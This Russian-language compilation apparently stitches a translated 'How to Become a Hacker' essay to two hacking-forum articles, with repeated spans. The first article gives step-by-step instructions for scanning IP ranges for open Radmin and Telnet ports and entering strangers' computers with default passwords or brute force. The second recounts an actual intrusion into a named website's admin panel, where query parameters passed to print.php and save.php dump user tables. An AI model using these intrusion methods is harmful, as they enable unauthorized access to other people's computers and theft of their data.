Авторитаризм процветает в условиях цензуры и секретности. Его адепты не верят в добровольное сотрудничество и в деление информацией, им нравится только такое "сотрудничество", которым руководят они. Поэтому, чтобы вести себя как хэкер, вы должны выработать в себе инстинктивное неприятие цензуры, секретности, а также применения силы или лжи для принуждения ответственных взрослых людей. И действовать необходимо исходя из такой веры.
5. Позиция не заменит компетентность.
Для того, чтобы быть хэкером, вы должны развить в себе некоторые из перечисленных подходов. Но ухватив лишь подход вы сделаетесь хэкером не в большей степени, чем спортсменом-рекордсменом или рок-звездой. Для того, чтобы стать хэкером, требуются интеллект, практика, самоотверженность и тяжкий труд.
Поэтому вам придется научиться с недоверием относится к позиции, но с уважением к компетентности любого рода. Хэкеры не позволят позерам транжирить их время, но они поклоняются компетентности, особенно - хэкерской компетентности, но компетентность хороша в чем угодно. Особо ценится обладание такими необходимыми навыками, которые мало у кого есть. А самое лучшее - это компетентность в таких навыках, которые требуют проницательного ума, сноровки и концентрации.
Если вы боготворите компетентность, то вы получаете наслаждение, развивая ее в себе. Тяжкий труд и преданность делу станут для вас захватывающей игрой, а не рутиной. И это жизненно необходимо для того, чтобы стать хэкером.
Основные навыки хэкера
Хэкерский взгляд на жизнь - это важно, но мастерство - многократно важнее. Позиция не заменит компетентости, и существует определенный набор базовых навыков, которыми вам необходимо обладать, прежде чем любой из хэкеров помыслит назвать хэкером и вас.
Этот базовый набор со временем потихоньку изменяется по мере того, как технология порождает новые навыки и делает ненужными устаревшие. Например, обычно упоминалось программирование на машинном языке, но, вплоть до недавнего времени, в набор не включали язык HTML. Однако, в сегодняшний комплект вполне определенно входят следующие компоненты:
1. Научитесь программировать.
Это, конечно же, фундаментальный хэкерский навык. Если вы не знаете ни одного компьютерного языка, я рекомендовал бы начать с языка Python. Он понятно разработан, хорошо документирован и относительно доброжелателен к новичкам. Несмотря на то, что он хорош для первого языка, это не просто игрушка. Это очень мощный и гибкий язык, хорошо подходящий для больших проектов.
Но знайте, что вы не достигнете хэкерского уровня мастерства (или даже просто уровня хорошего программиста), если будете знать лишь один язык. Вам необходимо научиться мыслить о проблемах программирования вообще, независимо от любого конкретного языка. Чтобы быть настоящим хэкером, вам надо достичь уровня, на котором вы сможете выучить новый язык за несколько дней, соотнося положения руководства с тем, что вам уже известно. Это означает, что вам следует выучить несколько очень разных языков.
Если вы занимаетесь серьезным программированием, то вам придется выучить Си, основной язык операционной системы Unix (хотя это и не тот язык, который следует пытаться выучить первым). Другие языки первостепенной важности для хэкеров - это Perl и LISP. Язык Perl имеет смысл выучить из практических соображений: он очень широко используется для активных web-страниц и системного администрирования, так что даже если вам никогда не придется писать на Perl, вы должны научиться его читать. LISP стоит выучить ради тех глубоких просвещенных познаний, которые вы обретете, когда наконец его освоите. Эти познания сделают вас прекрасным программистом на всю оставшуюся жизнь, даже если вы никогда особо и не будете использовать сам LISP.
Лучше всего, на самом деле, выучить все четыре этих языка (Python, C, Perl, и LISP). Помимо того, что это самые важные хэкерские языки, они демонстрируют очень разные подходы к программированию и каждый из них научит вас ценным вещам.
Я не могу дать здесь развернутые инструкции относительно того, как научиться программировать, - это сложное искусство. Но я могу сказать вам, что книги и курсы этому не научат (многие, возможно, большинство лучших хэкеров - это самоучки). Что этому учит, так это (а) чтение кодов и (б) писание кодов .
Научиться программировать - это как научиться писать хорошим естественным языком. Самый лучший способ для этого - почитать что-то из написанного мастерами, затем написать немного самому; прочесть побольше, написать немного побольше; прочитать еще больше, написать еще побольше... И повторять этот процесс до тех пор, пока ваши программы не разовьются в нечто мощное и экономичное.
Отыскать хорошие коды для чтения раньше было сложно, потому что было очень мало больших программ, доступных в исходных кодах и пригодных для изучения и возни юных хэкеров. Ныне ситуация кардинально изменилась: программы в исходных кодах, программистский инструментарий и операционные системы (все это создано хэкерами) теперь широко доступны. Что подводит меня прямо к следующему разделу...
2. Достаньте один из вариантов Unix в исходных кодах, научитесь его использовать и с ним работать.
Я полагаю, что вы имеете персональный компьютер или можете получить к нему доступ (сегодня этим ребятам все достается так легко :-)). Единственный и самый важный шаг, который любой из новичков может предпринять для приобретения хэкерских навыков, - это раздобыть копию Linux или одной из версий BSD-Unix, установить ее на персональной машине и запустить.
Да, в мире есть и другие операционные системы помимо Unix. Но их распространяют в двоичном виде - вы не сможете читать коды и не сможете их модифицировать. Учиться хэкерству на машинах, работающих под DOS, Windows или MacOS - это все равно что учиться танцевать полностью загипсованным.
Кроме того, Unix - это операционная система Интернета. Хотя вы можете научиться использовать Интернет и не зная Unix, но вы не можете быть Интернет-хэкером, не понимая Unix. По этой самой причине сегодняшняя хэкерская культура является весьма сильно Unix-сконцентрированной. (Это не всегда было так, и некоторым из прежних хэкеров такое положение дел не очень по нраву, но симбиоз между Unix и Интернетом стал настолько прочен, что даже сил Microsoft не хватает, чтобы серьезно на это влиять.)
Так что заводите себе Unix, мне самому нравится Linux, но есть и другие варианты (и да-да, вы можете работать как под Linux, так и под DOS/Windows на одной и той же машине). Выучите эту ОС. Работайте с ней. Возитесь с ней. Общайтесь через нее с Интернетом. Читайте коды. Модифицируйте их. Вы получите такой программистский инструментарий (включая C, Lisp и Perl), о котором любая из ОС Microsoft и не мечтала. Вы получите удовольствие, и вы усвоите больше знаний, чем предполагали в процессе обучения, когда оглянетесь на этот процесс уже будучи мастером-хэкером.
Для дополнительной информации об изучении Unix см. The Loginataka.
Чтобы заполучить в свои руки Linux, см. Where can I get Linux ("Где мне взять Linux").
3. Научитесь использовать World Wide Web и писать на HTML.
Большинство из тех вещей, что созданы хэкерской культурой, делают свое дело невидимо, помогая работать фабрикам, учреждениям и университетам без сколь-нибудь заметного влияния на жизнь не-хэкеров. WWW - это одно большое исключение, гигантская блестящая хэкерская игрушка, которая даже по признанию политиков изменяет мир. Лишь по одной этой причине (а также и множеству других приятных причин) вам следует научиться работать с Web.
Это не означает, что нужно просто научиться управляться с браузером (это любой умеет), но научиться писать на HTML, языке разметки документов Web. Если вы еще не умеете программировать, то писание на HTML обучит ваше мышление некоторым полезным привычкам, которые пригодятся при освоении языков программирования. Так что делайте домашнюю страничку.
Но простое обладание домашней страничкой даже и близко не подведет вас к тому, чтобы стать хэкером. В Web полным-полно домашних страничек. Большинство из них - это бессмысленный, бесполезный хлам. Крайне броско и привлекательно оформленный хлам, не спорю, но все равно хлам (подробнее об этом см. страничку "Ад HTML" -The HTML Hell Page).
Чтобы быть стоящей, ваша страничка должна иметь "контент" - содержание. Она должна быть интересной и / или полезной для других хэкеров. А это подводит нас к следующему разделу...
Статус в хэкерской культуре
Как и большинство культур без денежной экономики, Хэкерландия строится на репутации. Вы пытаетесь решить интересные проблемы, но вот насколько они интересны, и насколько в действительности хороши ваши решения, - это нечто такое, о чем обычно могут судить только (в техническом смысле) равные вам или превосходящие вас.
Таким образом, когда вы играете в хэкерские игры, вы учитесь вести счет главным образом по тому, что думают о вашем мастерстве другие (именно поэтому вы не будете хэкером до тех пор, пока вас не станут так называть другие хэкеры). Данный факт затеняют как образ хэкера-одиночки, так и определенные табу хэкерской культуры (ныне существенно ослабевшие, но все еще мощные), не допускающие, чтобы чье-то эго или внешнее признание вообще могли бы быть мотивацией для хэкера.
В частности, Хэкерландия - это то, что антропологи именуют "культурой даров". Вы зарабатываете статус и репутацию не тем, что руководите другими людьми, и не тем что прекрасны, и не тем что имеете вещи, которые являются предметом вожделения других. Но скорее тем, что раздаете вещи. В частности, одаривая своим временем, своим мастерством и результатами своего творчества.
Есть пять основных типов вещей, которые вы можете делать, чтобы вас уважали хэкеры:
1. Пишите программы с открытым исходным кодом.
Первое (самое главное и самое традиционное) - это писать программы, которые другие хэкеры считают забавными или полезными, и раздавать исходные коды программ для использования всей хэкерской культурой.
Мы привыкли называть такую работу "свободно-доступным программным обеспечением" (free software), но это привело в замешательство очень многих людей, точно не понимавших, что подразумевалось под словом "свободно-доступное". Теперь для такого программного обеспечения многие из нас предпочитают использовать термин "с открытым исходным кодом" или "open-source software".
Наиболее почитаемые полубоги Хэкерландии - это люди, которые написали большие и талантливые программы, отвечающие самым широким потребностям, и которые раздали их всем, так что каждый теперь их использует.
2. Помогайте тестировать и отлаживать программы с открытым исходным кодом
Почитаемы также те, кто тестирует и отлаживает программы с открытым кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.
Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее, к помощи в их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.
3. Публикуйте полезную информацию.
Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документах типа ЧаВО (FAQ или "часто задаваемые вопросы и ответы"), и делать их общедоступными.
Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходным кодом.
4. Помогайте поддерживать работу инфраструктуры.
Хэкерская культура (и инженерная разработка Интернет, к слову сказать) основана на добровольцах. Имеется масса необходимой, но не особо эффектной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирование новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.
Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Эта работа свидетельствует о самоотверженности.
5. Служите самой хэкерской культуре.
Наконец, вы можете служить и распространять саму культуру (например, составляя скрупулезное руководство "как стать хэкером" :-)). Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.
В хэкерской культуре нет явных лидеров, но здесь есть "культурные герои", "племенные старейшины", историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного из таких людей. Но остерегайтесь: хэкеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно быть скромным и милостивым в своем статусе.
Связь между хэкером и придурком
Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хэкером. Это, однако, помогает, и многие хэкеры действительно "придурки". Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышления и хэкерство.
Именно по этой причине многие хэкеры носят ярлык "придурок" и даже используют в качестве знака доблести более грубый термин "кретин" - это их способ декларации своей независимости от общепринятых в обществе оценок. С развернутой дискуссией по этому поводу можно познакомиться на "странице придурков" - The Geek Page.
Если вы способны в достаточной степени сосредоточиться на хэкерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче, чем в 1970-е, когда был новичком я. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придуркам. Есть даже растущее количество людей, обнаруживающих, что хэкеры зачастую могут быть вполне качественными любовниками и супругами. Дополнительную информацию на этот счет можно почерпнуть на странице "Девушкам о ребятах-придурках" - Girl's Guide to Geek Guys.
Если же вас влечет к хэкерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.
Черты образа жизни
Еще раз, чтобы быть хэкером, вы должны обрести мировоззрение хэкера. Есть несколько вещей, которые могут помочь в те моменты, когда вы не находитесь рядом с компьютером. Они не заменяют хэкерство (его ничто не заменит), но многие хэкеры ими занимаются и, по их ощущениям, это на каком-то фундаментальном уровне объединяет их с сутью хэкерства.
Читайте научную фантастику. Ходите на встречи любителей фантастики (это хороший способ познакомиться с хэкерами и "прото-хэкерами").
Изучайте Дзэн-буддизм и/или восточные искусства боя. (Их ментальная дисциплина имеет, похоже, важные черты сходства).
Вырабатывайте в себе аналитический музыкальный слух. Учитесь понимать специфические виды музыки. Учитесь неплохо играть на каком-нибудь музыкальном инструменте или грамотно петь.
Вырабатывайте в себе понимание каламбуров и игр в слова.
Учитесь хорошо писать на своем родном языке. (Удивительно многие из хэкеров, включая всех известных мне лучших хэкеров, являются качественными писателями.)
Чем больше из этих вещей вы уже делаете, тем больше вероятность того, что вы представляете собой природный хэкерский материал. Почему перечислены именно эти вещи - не вполне ясно, но они связаны со смешиванием навыков левого и правого полушарий мозга, а это представляется важным (для хэкеров необходимо уметь как выстраивать стройные логические обоснования, так и время от времени оценивать проблему вне связи с очевидной логикой).
И, наконец, несколько вещей, которые делать не следует.
Не используйте глупые и напыщенные пользовательские имена или клички.
Не вовлекайтесь в свары и перебранки в Usenet (или где-либо еще).
Не называйте себя "кибер-панком" и не тратьте свое время на тех, кто это делает.
Не отправляйте письма или электронную почту, переполненные ошибками правописания.
Единственная репутация, которую вы себе создадите, занимаясь любой из этих вещей - это посмешище. У хэкеров длинная память, и вам могут понадобиться годы жизни, чтобы об этом забыли.
Другие ресурсы
Питер Сибак ведет превосходную страницу "Хэкер-ЧаВО" - Hacker FAQ для менеджеров, не представляющих себе как иметь дела с хэкерами.
Мною написана также "Краткая история Хэкерландии" - A Brief History Of Hackerdom.
Я написал статью "Храм и Базар" - The Cathedral and the Bazaar, в которой разъясняется, как работают проект Linux и культура открытых исходных кодов. Еще более непосредственно эта же тема рассмотрена в статье-продолжении "Раздел Ноосферы" - Homesteading the Noosphere.
Часто задаваемые вопросы
В: Вы научите меня хэкерству?
С момента первой публикации этой страницы я получал от людей по нескольку запросов в неделю с просьбой "научить всему хэкерскому". К сожалению, я не располагаю ни временем, ни энергией этим заниматься. Мои собственные хэкерские проекты занимают 110% моего времени.
И даже если бы они у меня были, хэкерство - это мировоззрение и мастерство, которым вы должны научиться в основном сами. Вы обнаружите, что хотя настоящие хэкеры и желают вам помочь, но они не будут вас уважать, если вы станете просить накормить вас с ложечки всем, что им известно.
Сначала научитесь нескольким вещам сами. Покажите, что стараетесь, что способны к самостоятельному обучению. И уже потом отправляйтесь к знакомым хэкерам с вопросами.
В: Не поможете ли вы мне крэкнуть систему, или может научите, как их вскрывать?
Нет. Любой, кто может опять задавать подобный вопрос по прочтении данного текста, - бестолков настолько, что его ничему нельзя научить, даже если бы у меня было на это время. Любые подобные просьбы будут проигнорированы, либо же ответ будет крайне грубым.
Где мне найти настоящих хэкеров, чтобы с ними поговорить?
Самый лучший способ - найти вашу местную группу пользователей Unix или Linux и сходить на их встречи (ссылки на несколько списков групп пользователей можно найти на странице LDP на Sunsite).
(Как-то раньше я сказал, что вам не найти ни одного настоящего хэкера в чатах, но мне дали понять, что ситуация меняется. Очевидно, некоторые из сообществ настоящих хэкеров, связанных с такими вещами как GIMP и Perl, теперь имеют свои IRC-каналы.)
В: Какой язык следует выучить первым?
HTML, если вы его еще не знаете. Есть масса расфуфыренных и потрясающе бездарных книг по HTML, но обескураживающе мало хороших. Мне больше всего нравится HTML: The Definitive Guide.
Но HTML - это не полноценный язык программирования. Когда вы почувствуете, что готовы начать программировать, я бы порекомендовал начать с языка Python. Многие люди будут рекомендовать вам начинать с Perl, и этот язык более популярен чем Python, но его сложнее выучить.
Си - действительно важный язык, но он и намного сложнее, нежели Python или Perl. Не пытайтесь выучить его первым.
В: А не станет ли так, что из-за программ с открытым исходным кодом программистам будет не на что жить?
Ну, это вряд ли. Пока что, похоже, индустрия программного обеспечения с открытым исходным кодом скорее создает рабочие места, нежели их сокращает. Если экономически более прибыльно иметь написанную программу, чем такой программы не иметь, то программисту будут платить независимо от того, станет ли эта программа бесплатной после ее создания. И, независимо от того, как много будет написано "бесплатных" программ, всегда еще больше будет запросов на новые и специализированные приложения. Более подробно я написал об этом на страницах Open Source.
В: Как мне начать? Где можно достать бесплатный Unix?
Повсюду на этой странице я вставил указатели на те места, где можно взять наиболее широко используемые бесплатные версии Unix. Чтобы быть хэкером, вам нужны мотивация и инициатива, а также способность к самообразованию. Начинайте прямо сейчас...
статья о том какими методами можно пользоваться чтоб проникнуть в чужой комп.txt
Хай народ!Вот снова я добрался до Word-а и пишу статью о том какими методами можно пользоваться чтоб проникнуть в чужой комп,а точнее какими способами пользуюсь я,может кому пригодиться этот способ.Много вопросов я видел о том как взломать комп,и ответов хороших тоже много,но захотелось мне выложить одну такую статейку и на хакзоне.Сейчас я опишу наиболие популярные способы по проникновению на чужой комп,один из них я видел тут на хакзоне,но об этом я описал ниже.И так давайте начьнём.
Что же нам понадобиться для дальнееших действий?Нам будет необходимо:
-Сканер портов (Или сканер безопасности)
-Телнет клиент (Он входит в стандартную комплектацию Windows-a)
-Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже)
Это всё самое необходимое.И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами:
-Через порт радмина (4899 порт)
-Телнет порт (23 порт)
Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них.
Начнём с радмина:
РАДМИН (Radmin):
Тут на хакзоне я видел видео по проникновению на чужой комп используя радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и простой способ ещё раз,так как этот способ входит в мою статью,и может кто не смотрел видео.
Радмин,порт которого 4899,используеться для удалённого администрирования,для того чтоб открыть порт радмина,на компе должен быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв с открытым 4899 портом.
Я для этого буду использовать сканер уязвимостей XSpider.
Запускаем XSpider,и создаём новый профиль (Профиль-Новый):
-В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке "NetBIOS",снимаем все галочки,переходим к следующей,Telnet,от туда тоже снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем галки,и не меняем никакие параметры) когда дошли до вкладки "Сканер Портов",останавлеваемся на этой вкладке,и видим там надпись в низу окна:
Файл портов: default.prf
Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в верху на запись "Новый",в ещё одном появившемся окошке жмём кнопку "Выбрать",В появившемся окне,в поле "Коментарий" давайте впишем 4899.В нижнее поле в том же окне с названием "Добавить прт[ы]:"
Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на "Сохранить как...",В поле "Имя файла" вписываем 4899,и жмём "Сохранить".Далее в появившемся списке профилев выбираем наш созданный "4899" и жмём "Выбрать".Далее в оставшемся окне насройки профиля,переходим к вкладке NetBIOS,и жмём там "Сохранить как...",пишим в поле "имя файла" 4899 и жмём "Сохранить".
Уффф...,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий) кликаем по нему один раз,и жмём выбрать.
Теперь когда профиль создан и выбран,нужно просканить определённый диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до 79.126.27.255
Жмём в Спайдере "Добавить диапазон",вписываем нужный,и жмём ОК,когда спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто допустим мы начали сканить диапазон
79.126.27.0 - 79.126.27.255.
Когда спайдер находит жертву с открытым 4899 портом тот айпи выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот просканив этот диапазон я один раз нашел уязвимый комп,это 19.126.27.202.
Теперь берём прогу Radmin Viewer (Не спутайте с Radmin Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899 портом,выбераем режим подключения,для удобства выберайте "File-transfer",и подключаемся,Если версия сервера радмина установленная на компе жертвы ниже 2.2,то попросит только пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если не подошел,то тогда придёться использовать брутер,но чаще всего стоит по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня есть,если кому надо,то стучите в асю,скину брутер.
Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким простым способом мы получили доступ к удалённому компу.
Тепеь давайте рассмотрим взлом через телнет.
TELNET
Искать компы с открытым 23 портом телнетом можно также как я описывал во взломе с радмином,только при настройке профиля,указываем 23 порт а не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил брутфорс.Подойдёт BrutusAET2.
Я тут описал только самый простой способ искать телнет порты и взламывать,может кто то использует и другой,но я описал как этим пользуюсь я.
Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп.
Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь трояном.Как это делать описывать не буду потомучто на хакзоне этого много.
На этом пока всё,в следующей статье опишу как взломать через шары (Shared Resources),Но это потом.)
Ну,спасибо за внимания,с вами был redbu11.Желаю всем успехов со взломом!Пока!)))
Что же нам понадобиться для дальнееших действий?Нам будет необходимо:
-Сканер портов (Или сканер безопасности)
-Телнет клиент (Он входит в стандартную комплектацию Windows-a)
-Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже)
Это всё самое необходимое.И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами:
-Через порт радмина (4899 порт)
-Телнет порт (23 порт)
Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них.
Начнём с радмина:
РАДМИН (Radmin):
Тут на хакзоне я видел видео по проникновению на чужой комп используя радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и простой способ ещё раз,так как этот способ входит в мою статью,и может кто не смотрел видео.
Радмин,порт которого 4899,используеться для удалённого администрирования,для того чтоб открыть порт радмина,на компе должен быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв с открытым 4899 портом.
Я для этого буду использовать сканер уязвимостей XSpider.
Запускаем XSpider,и создаём новый профиль (Профиль-Новый):
-В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке "NetBIOS",снимаем все галочки,переходим к следующей,Telnet,от туда тоже снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем галки,и не меняем никакие параметры) когда дошли до вкладки "Сканер Портов",останавлеваемся на этой вкладке,и видим там надпись в низу окна:
Файл портов: default.prf
Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в верху на запись "Новый",в ещё одном появившемся окошке жмём кнопку "Выбрать",В появившемся окне,в поле "Коментарий" давайте впишем 4899.В нижнее поле в том же окне с названием "Добавить прт[ы]:"
Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на "Сохранить как...",В поле "Имя файла" вписываем 4899,и жмём "Сохранить".Далее в появившемся списке профилев выбираем наш созданный "4899" и жмём "Выбрать".Далее в оставшемся окне насройки профиля,переходим к вкладке NetBIOS,и жмём там "Сохранить как...",пишим в поле "имя файла" 4899 и жмём "Сохранить".
Уффф...,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий) кликаем по нему один раз,и жмём выбрать.
Теперь когда профиль создан и выбран,нужно просканить определённый диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до 79.126.27.255
Жмём в Спайдере "Добавить диапазон",вписываем нужный,и жмём ОК,когда спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто допустим мы начали сканить диапазон
79.126.27.0 - 79.126.27.255.
Когда спайдер находит жертву с открытым 4899 портом тот айпи выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот просканив этот диапазон я один раз нашел уязвимый комп,это 19.126.27.202.
Теперь берём прогу Radmin Viewer (Не спутайте с Radmin Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899 портом,выбераем режим подключения,для удобства выберайте "File-transfer",и подключаемся,Если версия сервера радмина установленная на компе жертвы ниже 2.2,то попросит только пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если не подошел,то тогда придёться использовать брутер,но чаще всего стоит по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня есть,если кому надо,то стучите в асю,скину брутер.
Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким простым способом мы получили доступ к удалённому компу.
Тепеь давайте рассмотрим взлом через телнет.
TELNET
Искать компы с открытым 23 портом телнетом можно также как я описывал во взломе с радмином,только при настройке профиля,указываем 23 порт а не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил брутфорс.Подойдёт BrutusAET2.
Я тут описал только самый простой способ искать телнет порты и взламывать,может кто то использует и другой,но я описал как этим пользуюсь я.
Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп.
Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь трояном.Как это делать описывать не буду потомучто на хакзоне этого много.
На этом пока всё,в следующей статье опишу как взломать через шары (Shared Resources),Но это потом.)
Ну,спасибо за внимания,с вами был redbu11.Желаю всем успехов со взломом!Пока!)))
Способы взлома
Привет, мой юный друг. В первой статье я описал два вида взломов,
кторые бывают: шаблонный и "свой" взломы. Вообще, в дальнейшем я
не буду особо заострять внимание на шаблонных взломах, причины
я описывал в первой статье. Итак, сегодня я расскажу тебе об одном
взломе, который я произвел специально для написания этой статьи.
Итак, существует сайт: http://www.hasher.ru. выкачав все файлы
из этого сайта, я обнаружил интересную директорию:
http://www.hasher.ru/sale/admin/, открыв эту дерикторию, я увидел
красивую картинку, на которой красовалась надпись: "Обратотка заказов",
а под картинкой интересная форма, с кнопочкой "Логин". Как я не
пытался угадать пароль, скрипт не поддался. Однако потом, до меня
дошли сведения, что каждый модуль этой системы находиться в своем
файле, и вызывается этот модуль не из оного скрипта, а загружаясь
отдельно. Также мне стало известно, что в этой системе существует
модуль, который генерирует страницу для распечатки каких-то данных,
таким образом, можно предположить, что система имеет файл, корень
названия которого "print". Попробывав ввести адрес
http://www.hasher.ru/sale/admin/print.php, я получил страницу, с
характерной ошибкой:
"Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in
/usr/home/hasher/public_html/www.hasher.ru/sale/admin/print.php
on line 18" - она говорит нам про какую-то ошибку при работе с
MySQL. Но... увы :(, это нам ничего не дает, как ни крути...
Но! Попробуем открыть хтмл-код главной страницы, той, где нас
просили ввести лоигн. Мы видим весьма интересный ява-скрипт,
понятно, что на существующей странице, то есть на странице, кторая
еще не сгенерирована, ибо не введен валидный логин, этот код нигде
не используется. Получается, что мы, как бы приоткрыли часть кода
главной страницы атакуемой системы. Итак, что же мы видим в этом
скрипте:
function toprint(obj)
{
var a = (obj.id.value);
var b = (forme.sss.value);
var p = (forma.pr.value);
var n1 = Number(fnum.num.value);
var n2 = n1+1;
var d = ",";
var q = "id = ";
var z = " or ";
var c = a+d+b;
var topr = p+q+a+z;
fnum.num.value = n2;
forma.pr.value = topr;
formb.mail1.value = topr;
formc.mail2.value = topr;
formd.del.value = topr;
formf.saving.value = topr;
formg.edit.value = topr;
forme.sss.value = c;
}
Сразу затрагивает внимание эта операция: var topr = p+q+a+z;.
Она интересна потому что почти всем остальным объектам этой
страницы присваивается результат этой операции. Итак, мы видим,
что в этой операции объявляется переменная "topr", которая
собирается из некоторых кусочков (p, q, a и z). Итак, переменная
"р", она у нас берется из value какого-то объекта страницы, можно
предположить, что это объект input. Затем переменная "q", она
равна строке "id = ". Переменная "а", она равна id, обекта, по которому
случается событие, то есть если это ,
то "а" будет равно 666. И, наконец переменная "z", она равна строке
" or ". Очень настораживают переменные q и z, строки, содержащиеся
в них, очень напоминают mysql-запрос. Теперь посмотрим, что дальше происходит
с переменной "р": в ее объект записывается результат topr, то есть "р"
у нас как бы в "круговороте". Теперь попробуем прикинуть, каким будет topr,
если в него подставить свои данные: topr="id = 3 or ", это при условии, что
переменная "р" пустая, то бишь после первого вызова функции. Итак, все это
хозяйство очень напоминает mysql-запрос, также мы знаем, что он (запрос)
записывается в value объекта pr, то бишь, запрос передается в переменной pr.
Теперь вспомним про ошибку, которую нам выдавал файл print.php, понятно, что
скрипт ругался на отсутвие или не валидность mysql-запроса. Теперь предположим,
что наша переменная pr передается методом GET, тогда пробуем передать
срипту print.php нашу переменную:
"http://www.hasher.ru/sale/admin/print.php?pr=id = 3 or",
видим, что ошибка пропала, ))) значит мы где-то рядом, теперь попробуем вместо
3, поставить другую цифру, например, 6, и что мы видим :)))? *(скрипт выдал нам
страницу, для печати данных о пользователе 6)
Вот, в принципе, и все, сам я было на этом остановился, но... потом до меня дошло,
что "pr" чем-то похоже на "print". Отсюда следует, что также существуют
файлы, названия которых похожи на другие объекты страницы. Для примера возьмем
formf.saving.value, попробывав "побрутить" название файла вручную, находим,
что существует файл save.php, он также имеет такую же ошибку, что и print.php.
Сдесь все также, как и с print.php, отличие только в том, что скрипт получает
переменную saving, теперь попробывав передать переменную saving с тем же
запросом, что и для print.php, мы увидим, что скрипт поддался, и даже выдал нам
больше информации, чем в первом примере. А теперь попробуем ввести то же самое,
только без " or " :)) *(скрипт выдает всю таблицу).
Вот и все. На этом взлом окончен, во всяком случае я, больше ничего не нашел,
может тебе повезет больше...
© Franklin
кторые бывают: шаблонный и "свой" взломы. Вообще, в дальнейшем я
не буду особо заострять внимание на шаблонных взломах, причины
я описывал в первой статье. Итак, сегодня я расскажу тебе об одном
взломе, который я произвел специально для написания этой статьи.
Итак, существует сайт: http://www.hasher.ru. выкачав все файлы
из этого сайта, я обнаружил интересную директорию:
http://www.hasher.ru/sale/admin/, открыв эту дерикторию, я увидел
красивую картинку, на которой красовалась надпись: "Обратотка заказов",
